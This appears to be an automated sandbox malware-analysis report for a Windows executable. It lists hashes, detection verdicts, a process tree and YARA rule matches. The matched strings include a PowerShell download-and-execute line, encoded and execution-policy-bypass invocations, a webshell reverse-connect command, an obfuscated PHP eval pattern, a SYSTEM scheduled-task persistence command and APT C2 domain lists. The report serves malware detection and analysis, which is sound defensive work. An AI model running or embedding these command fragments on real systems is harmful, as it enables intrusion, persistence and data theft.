Play interactive tour

Edit tour

Analysis Report GZe6EcSTpO

Overview

General Information

Sample Name:	GZe6EcSTpO (renamed file extension from none to exe)
Analysis ID:	380813
MD5:	87e0355c098d2dfd890ae4c9da26bbdd
SHA1:	5f300f4dd15cccbe51cd4df51ac30b7c2c84fc75
SHA256:	570c3c298c2d30bfd7d824b0ec8e28b3efa51bf269297348fc5fc30cb81a2d7e
Tags:	1512361453
Infos:
Most interesting Screenshot:

Detection

Mimikatz HawkEye Nanocore xRAT CobaltStrike Codoso Ghost Coinhive Crypto Miner GhostRat Mini RAT Mirai Nukesped PupyRAT Quasar RevengeRAT ComRAT UACMe WebMonitor RAT Xmrig Xtreme RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected Hacktool Mimikatz

Detected HawkEye Rat

Detected Nanocore Rat

Detected xRAT

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected CobaltStrike

Yara detected Codoso Ghost

Yara detected Coinhive miner

Yara detected Crypto Miner

Yara detected GhostRat

Yara detected Mimikatz

Yara detected Mini RAT

Yara detected Mirai

Yara detected Nukesped

Yara detected Powershell download and execute

Yara detected PupyRAT

Yara detected Quasar RAT

Yara detected RevengeRAT

Yara detected Turla ComRAT XORKey

Yara detected UACMe UAC Bypass tool

Yara detected WebMonitor RAT

Yara detected Xmrig cryptocurrency miner

Yara detected Xtreme RAT

Deletes itself after installation

Found Tor onion address

Found strings related to Crypto-Mining

Modifies existing user documents (likely ransomware behavior)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes a notice file (html or txt) to demand a ransom

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w10x64

GZe6EcSTpO.exe (PID: 5884 cmdline: 'C:\Users\user\Desktop\GZe6EcSTpO.exe' MD5: 87E0355C098D2DFD890AE4C9DA26BBDD)

vnwareupdate.exe (PID: 2540 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' -r tNdLZso+RbiqYzcNMmDUvJn8W3VMjDSxgB461SVTbrzMmtabvNhkHuZIvNduUGjO7UzqsUnmuPq7GKNjbUUEmbjXWxezy7xJ04G+icWNgQLiwxU/H/LMW24G/9O1+8K4oWZz+411UOx9sxEV6gpox/NT3jtp1cMUSmDDWI3Abi8XrFiOXG8AgMkOFBVNgdv0d+Dha+cRprvunFNJBh/+mVDp1EkdsXXU0eMQcUpns8p6kdiZ4rFZD4y5oVgqOEZ9Po4Z4HgwiHmPwR8ajszuHS68AdaUj0pH0IEHv2mNV71t2soPIKLuE6vIlqTHadsqd5m4qTWlE5yUZYw6YMMgmll72lf1E232p9MVl4yhetYBzNx+sWPE+DpILBlSmddPucuORCpaLa5yzRa7ZbJ98jQfjCVZUbyNMn5Vxk30OIGoBOyrsN0VmKcdDsRZxUCHQhupf0BXrgN7wh46haut8zZzv6puQEmuGL/8u2wQFQEd9pNBJ0Rlv3QP/bjyE945wMYCc6Xz4QLd03mLiDwTqcCYAP/KGG8Yhr3pv/YbSaeW0WUI4zwTjoJArSp8wQL4F7Eb5XLV6Id8VVowmbmosktt/RQUrLvThJExvG5SvJP/mUR4/fnp2sNhMJrQ0VYv8PabCT5DFqxapVfyOG02/QYIIhU= MD5: FA8AFFACE280644885152DE7CD3234EE)

vnwareupdate.exe (PID: 4456 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1092' MD5: FA8AFFACE280644885152DE7CD3234EE)

vnwareupdate.exe (PID: 6352 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1136' MD5: FA8AFFACE280644885152DE7CD3234EE)

vnwareupdate.exe (PID: 6404 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1244' MD5: FA8AFFACE280644885152DE7CD3234EE)

vnwareupdate.exe (PID: 6432 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1236' MD5: FA8AFFACE280644885152DE7CD3234EE)

vnwareupdate.exe (PID: 7044 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1256' MD5: FA8AFFACE280644885152DE7CD3234EE)

vnwareupdate.exe (PID: 5432 cmdline: 'C:\Users\user\Desktop\vnwareupdate.exe' '--multiprocessing-fork' '1300' MD5: FA8AFFACE280644885152DE7CD3234EE)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\keywords.txt	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x2b9:$x7: Invoke-Mimikatz
C:\Users\user\Desktop\c2-iocs.txt	APT10_Malware_Sample_Gen	APT 10 / Cloud Hopper malware campaign	Florian Roth	0x2e85:$c2_1: 002562066559681.r3u8.com 0x2ec5:$c2_2: 031168053846049.r3u8.com 0x2f05:$c2_3: 0625.have8000.com 0x2f3e:$c2_4: 1.gadskysun.com 0xc729:$c2_5: 100fanwen.com 0xd075:$c2_5: 100fanwen.com 0x2f75:$c2_6: 11.usyahooapis.com 0x2faf:$c2_7: 19518473326.r3u8.com 0x2feb:$c2_8: 1960445709311199.r3u8.com 0x302c:$c2_9: 1j.www1.biz 0x305f:$c2_10: 1z.itsaol.com 0x9d1f:$c2_11: 2012yearleft.com 0xc87f:$c2_11: 2012yearleft.com 0xfaaa:$c2_11: 2012yearleft.com 0x3094:$c2_12: 2014.zzux.com 0x647d:$c2_12: 2014.zzux.com 0x11606:$c2_12: 2014.zzux.com 0x30c9:$c2_13: 202017845.r3u8.com 0x3103:$c2_14: 2139465544784.r3u8.com 0x3141:$c2_15: 2789203959848958.r3u8.com 0x31f2:$c2_16: 5590428449750026.r3u8.com
C:\Users\user\Desktop\c2-iocs.txt	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x386:$180: 180.150.228.102
C:\Users\user\Desktop\filename-iocs.txt	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x9750:$s11: elatedmonkey 0x979a:$s13: endlessdonut 0x9622:$elf1: catflap 0x9630:$elf1: catflap 0x964f:$elf2: charm_penguin 0x9662:$elf3: charm_hammer 0x96d2:$elf5: dampcrowd 0x9730:$elf8: ebbshave 0x9740:$elf9: eggbasket 0x9777:$elf10: toffeehammer 0x97ac:$elf11: enemyrun 0x97d2:$elf12: envoytomato 0x97e3:$elf13: expoxyresin 0x9803:$elf14: estopmoonlit 0x98a8:$elf17: ghost_sparc 0x98c8:$elf18: jackpop 0x98fa:$elf19: orleans_stride 0x9933:$elf21: seconddate 0x9943:$elf23: skimcountry 0x9954:$elf24: slyheretic 0x9964:$elf25: stoicsurgeon
C:\Users\user\Desktop\hash-iocs.txt	EquationDrug_HDDSSD_Op	EquationDrug - HDD/SSD firmware operation - nls_933w.dll	Florian Roth @4nc4p	0x10fca:$s0: nls_933w.dll 0x11045:$s0: nls_933w.dll
C:\Users\user\Desktop\otx-c2-iocs.txt	APT10_Malware_Sample_Gen	APT 10 / Cloud Hopper malware campaign	Florian Roth	0x8639b:$c2_1: 002562066559681.r3u8.com 0x86433:$c2_2: 031168053846049.r3u8.com 0x5ff5d:$c2_3: 0625.have8000.com 0x2c8e04:$c2_3: 0625.have8000.com 0x864cb:$c2_4: 1.gadskysun.com 0x616ca:$c2_5: 100fanwen.com 0x619a5:$c2_5: 100fanwen.com 0x26ee11:$c2_5: 100fanwen.com 0x60ec4:$c2_6: 11.usyahooapis.com 0x8655a:$c2_7: 19518473326.r3u8.com 0x865ee:$c2_8: 1960445709311199.r3u8.com 0x64970:$c2_9: 1j.www1.biz 0x62b6d:$c2_10: 1z.itsaol.com 0x5fff5:$c2_11: 2012yearleft.com 0x607f7:$c2_11: 2012yearleft.com 0x6091d:$c2_11: 2012yearleft.com 0x1261a0:$c2_11: 2012yearleft.com 0x28e9ab:$c2_11: 2012yearleft.com 0x2c90e7:$c2_11: 2012yearleft.com 0x2ca88f:$c2_11: 2012yearleft.com 0x2cabf2:$c2_11: 2012yearleft.com
C:\Users\user\Desktop\otx-c2-iocs.txt	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x9d0:$a: Amplia Security
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0xbf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0xd38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xe79:$s0: Safe0ver
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x191d0:$a: Amplia Security 0x19180:$c: getlsasrvaddr.exe 0x26140:$d: Cannot get PID of LSASS.EXE 0x262c0:$e: extract the TGT session key
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x2a6c8:$s1: except SqlmapBaseException, ex:
0000000A.00000003.321850832.00000000068D1000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x25d20:$s0: Auto Scroll BOTH Text Boxes 0x25f90:$s4: Start/Stop Portscanning 0x2a348:$s6: Auto Save LogFile by pressing STOP
00000013.00000003.473985141.0000000006BA5000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x8818:$x5: p0wnedShellx64
00000013.00000003.428708026.0000000006BA5000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x8818:$x5: p0wnedShellx64
00000013.00000003.436058475.0000000006B94000.00000004.00000001.sdmp	webshell_PHP_b37	Web Shell - file b37.php	Florian Roth	0x7220:$s0: xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc
00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x215:$s1: $_POST['backconnectip']
00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp	Webshell_27_9_acid_c99_locus7s	Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt	Florian Roth	0x1f8:$s0: $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x2cf86:$sa2: -EncodedCommand 0x2cf74:$sc1: -nop 0x2cf79:$se2: -exec bypass 0x2cf79:$se4: -exec bypass
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2cf6a:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2cfa0:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2cf39:$x5: Failed to impersonate logged on user %d (%u)
00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x50768:$f: PPWDUMP_DATA
0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x7926:$sAuthor: ShAnKaR
0000000A.00000003.312404128.0000000006667000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x5558:$x5: p0wnedShellx64
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0xa7e:$s11: elatedmonkey 0x656:$elf4: charm_saver 0xf76:$elf8: ebbshave 0xd96:$elf9: eggbasket 0xa47:$elf17: ghost_sparc 0xeae:$elf18: jackpop 0x656:$pe2: charm_saver 0xa53:$pe3: ghost_x86
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp	webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0x1e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp	WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0x1e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0xdd8:$php: <? 0xdde:$payload3: eval(gzuncompress(base64_decode(
00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp	webshell_php_h6ss	Web Shell - file h6ss.php	Florian Roth	0xdd8:$s0: <?php eval(gzuncompress(base64_decode("
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	HKTL_Lazagne_Gen_18	Detects Lazagne password extractor hacktool	Florian Roth	0x8b74:$x1: lazagne.config.powershell_execute( 0x8b9b:$x2: creddump7.win32. 0x8bb0:$x3: lazagne.softwares.windows.hashdump 0x8bd7:$x4: .softwares.memory.libkeepass.common(
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	HKTL_NoPowerShell	Detects NoPowerShell hack tool	Florian Roth	0x7f19:$x1: \NoPowerShell.pdb
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	HKTL_LNX_Pnscan	Detects Pnscan port scanner	Florian Roth	0x2acc:$x1: -R<hex list> Hex coded response string to look for. 0x2b06:$x2: This program implements a multithreaded TCP port scanner.
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0xb2ce:$s1: "c" & "r" & "i" & "p" & "t"
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	SUSP_Netsh_PortProxy_Command	Detects a suspicious command line with netsh and the portproxy command	Florian Roth	0x39ce:$x1: netsh interface portproxy add v4tov4 listenport=
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x8d8e:$s2: _ScreenshotLogger 0x8da4:$s3: _PasswordStealer
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	VUL_JQuery_FileUpload_CVE_2018_9206	Detects JQuery File Upload vulnerability CVE-2018-9206	Florian Roth	0xa0a8:$s1: error_reporting(E_ALL \| E_STRICT); 0xa0cf:$s2: require('UploadHandler.php'); 0xa0f1:$s3: $upload_handler = new UploadHandler();
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	APT_FIN7_Strings_Aug18_1	Detects strings from FIN7 report in August 2018	Florian Roth	0xd807:$s1: &&call %a01%%a02% /e:jscript 0xd828:$s2: wscript.exe //b /e:jscript %TEMP% 0xd84e:$s3: w=wsc@ript /b 0xd862:$s4: @echo %w:@=%\|cmd 0xd877:$s5: & wscript //b /e:jscript
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	APT_FIN7_MalDoc_Aug18_1	Detects malicious Doc from FIN7 campaign	Florian Roth	0xdcfd:$s1: <photoshop:LayerText>If this document was downloaded from your email, please click "Enable editing" from the yellow bar above
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	HKTL_PowerKatz_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0x63c0:$x1: Powerkatz32 0x63d0:$x2: Powerkatz64 0x63e0:$s1: GetData: not found taskName 0x6400:$s2: GetRes Ex:
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	HKTL_Unknown_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0x6572:$x1: not a valid timeout format! 0x6592:$x2: host can not be empty! 0x65ad:$x3: not a valid port format! 0x65ca:$x4: {0} - {1} TTL={2} time={3} 0x65e9:$x5: ping count is not a correct format! 0x6611:$s1: The result is too large,program store to '{0}'.Please download it manully. 0x6660:$s2: C:\Windows\temp\
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xe0d2:$sb1: -w Hidden 0xe0af:$sc1: -NoP 0xe0b4:$sd1: -NonI 0x4067:$se2: -exec bypass 0xe0ba:$se3: -ExecutionPolicy Bypass 0x4067:$se4: -exec bypass
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_1	Detects APT34 PowerShell malware	Florian Roth	0x3b83:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x3de4:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x3bd9:$x2: Write-Host "excepton occured!" 0x3bfc:$s1: Start-Sleep -s 1; 0x3c12:$s2: Start-Sleep -m 100;
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_2	Detects APT34 PowerShell malware	Florian Roth	0x3daa:$x1: = "http://" + [System.Net.Dns]::GetHostAddresses(" 0x3de1:$x2: $t = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x3e3a:$x3: \| Where { $_ -notmatch '^\s+$' } 0x3e5f:$s1: = new-object System.Net.WebProxy($u, $true); 0x3e90:$s2: -eq "dom"){$ 0x3ea2:$s3: -eq "srv"){$ 0x3eb4:$s4: +"<>" \| Set-Content
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_3	Detects APT34 PowerShell malware	Florian Roth	0x4059:$x1: Powershell.exe -exec bypass -file ${global:$address1} 0x4093:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn 0x40cc:$x3: "\UpdateTasks\UpdateTaskHosts" 0x40ef:$x4: wscript /b \`"${global:$address1 0x4114:$x5: ::FromBase64String([string]${global:$http_ag})) 0x4148:$x6: .run command1, 0, false" \| Out-File 0x4171:$x7: \UpdateTask.vbs 0x4185:$x8: hUpdater.ps1
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x6ec4:$s1: Stratum notify: invalid Merkle branch 0x6eee:$s2: -t, --threads=N number of miner threads (default: number of processors) 0x6f40:$s3: User-Agent: cpuminer/ 0x6f5a:$s4: hash > target (false positive) 0x6f7d:$s5: thread %d: %lu hashes, %s khash/s
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	HKTL_Dsniff	Detects Dsniff hack tool	Florian Roth	0x53bf:$x1: .account.\|.acct.\|.domain.\|.login.\|.member.
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x42fe:$s1: www.naver.com 0x473c:$s1: www.naver.com 0x4310:$s2: PolarSSL Test CA0
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	JoeSecurity_CryptoMiner	Yara detected Crypto Miner	Joe Security
00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
0000000A.00000003.324847009.0000000006648000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x299e:$s2: Auditcleaner 0xece:$elf12: envoytomato 0xf2e:$elf14: estopmoonlit
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	HKTL_Lazagne_Gen_18	Detects Lazagne password extractor hacktool	Florian Roth	0x8b74:$x1: lazagne.config.powershell_execute( 0x8b9b:$x2: creddump7.win32. 0x8bb0:$x3: lazagne.softwares.windows.hashdump 0x8bd7:$x4: .softwares.memory.libkeepass.common(
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	HKTL_NoPowerShell	Detects NoPowerShell hack tool	Florian Roth	0x7f19:$x1: \NoPowerShell.pdb
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	HKTL_LNX_Pnscan	Detects Pnscan port scanner	Florian Roth	0x2acc:$x1: -R<hex list> Hex coded response string to look for. 0x2b06:$x2: This program implements a multithreaded TCP port scanner.
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0xb2ce:$s1: "c" & "r" & "i" & "p" & "t"
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	SUSP_Netsh_PortProxy_Command	Detects a suspicious command line with netsh and the portproxy command	Florian Roth	0x39ce:$x1: netsh interface portproxy add v4tov4 listenport=
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x8d8e:$s2: _ScreenshotLogger 0x8da4:$s3: _PasswordStealer
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	VUL_JQuery_FileUpload_CVE_2018_9206	Detects JQuery File Upload vulnerability CVE-2018-9206	Florian Roth	0xa0a8:$s1: error_reporting(E_ALL \| E_STRICT); 0xa0cf:$s2: require('UploadHandler.php'); 0xa0f1:$s3: $upload_handler = new UploadHandler();
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	APT_FIN7_Strings_Aug18_1	Detects strings from FIN7 report in August 2018	Florian Roth	0xd807:$s1: &&call %a01%%a02% /e:jscript 0xd828:$s2: wscript.exe //b /e:jscript %TEMP% 0xd84e:$s3: w=wsc@ript /b 0xd862:$s4: @echo %w:@=%\|cmd 0xd877:$s5: & wscript //b /e:jscript
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	APT_FIN7_MalDoc_Aug18_1	Detects malicious Doc from FIN7 campaign	Florian Roth	0xdcfd:$s1: <photoshop:LayerText>If this document was downloaded from your email, please click "Enable editing" from the yellow bar above
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	HKTL_PowerKatz_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0x63c0:$x1: Powerkatz32 0x63d0:$x2: Powerkatz64 0x63e0:$s1: GetData: not found taskName 0x6400:$s2: GetRes Ex:
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	HKTL_Unknown_Feb19_1	Detetcs a tool used in the Australian Parliament House network compromise	Florian Roth	0x6572:$x1: not a valid timeout format! 0x6592:$x2: host can not be empty! 0x65ad:$x3: not a valid port format! 0x65ca:$x4: {0} - {1} TTL={2} time={3} 0x65e9:$x5: ping count is not a correct format! 0x6611:$s1: The result is too large,program store to '{0}'.Please download it manully. 0x6660:$s2: C:\Windows\temp\
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0xe0d2:$sb1: -w Hidden 0xe0af:$sc1: -NoP 0xe0b4:$sd1: -NonI 0x4067:$se2: -exec bypass 0xe0ba:$se3: -ExecutionPolicy Bypass 0x4067:$se4: -exec bypass
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_1	Detects APT34 PowerShell malware	Florian Roth	0x3b83:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x3de4:$x1: = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x3bd9:$x2: Write-Host "excepton occured!" 0x3bfc:$s1: Start-Sleep -s 1; 0x3c12:$s2: Start-Sleep -m 100;
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_2	Detects APT34 PowerShell malware	Florian Roth	0x3daa:$x1: = "http://" + [System.Net.Dns]::GetHostAddresses(" 0x3de1:$x2: $t = get-wmiobject Win32_ComputerSystemProduct \| Select-Object -ExpandProperty UUID 0x3e3a:$x3: \| Where { $_ -notmatch '^\s+$' } 0x3e5f:$s1: = new-object System.Net.WebProxy($u, $true); 0x3e90:$s2: -eq "dom"){$ 0x3ea2:$s3: -eq "srv"){$ 0x3eb4:$s4: +"<>" \| Set-Content
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	APT_APT34_PS_Malware_Apr19_3	Detects APT34 PowerShell malware	Florian Roth	0x4059:$x1: Powershell.exe -exec bypass -file ${global:$address1} 0x4093:$x2: schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn 0x40cc:$x3: "\UpdateTasks\UpdateTaskHosts" 0x40ef:$x4: wscript /b \`"${global:$address1 0x4114:$x5: ::FromBase64String([string]${global:$http_ag})) 0x4148:$x6: .run command1, 0, false" \| Out-File 0x4171:$x7: \UpdateTask.vbs 0x4185:$x8: hUpdater.ps1
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	PUA_CryptoMiner_Jan19_1	Detects Crypto Miner strings	Florian Roth	0x6ec4:$s1: Stratum notify: invalid Merkle branch 0x6eee:$s2: -t, --threads=N number of miner threads (default: number of processors) 0x6f40:$s3: User-Agent: cpuminer/ 0x6f5a:$s4: hash > target (false positive) 0x6f7d:$s5: thread %d: %lu hashes, %s khash/s
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	HKTL_Dsniff	Detects Dsniff hack tool	Florian Roth	0x53bf:$x1: .account.\|.acct.\|.domain.\|.login.\|.member.
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_1	Detects HOPLIGHT malware used by HiddenCobra APT group	Florian Roth	0x42fe:$s1: www.naver.com 0x473c:$s1: www.naver.com 0x4310:$s2: PolarSSL Test CA0
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	JoeSecurity_CryptoMiner	Yara detected Crypto Miner	Joe Security
0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
0000000A.00000003.316213218.0000000006859000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x44768:$f: PPWDUMP_DATA
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x28af0:$c: getlsasrvaddr.exe 0x2c420:$e: extract the TGT session key
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp	SQLMap	This signature detects the SQLMap SQL injection tool	Florian Roth	0x3a6f0:$s1: except SqlmapBaseException, ex:
00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp	PortRacer	Auto-generated rule on file PortRacer.exe	yarGen Yara Rule Generator by Florian Roth	0x2c090:$s0: Auto Scroll BOTH Text Boxes 0x2c4e0:$s4: Start/Stop Portscanning 0x3a6b8:$s6: Auto Save LogFile by pressing STOP
0000000A.00000003.323605826.0000000006667000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x5558:$x5: p0wnedShellx64
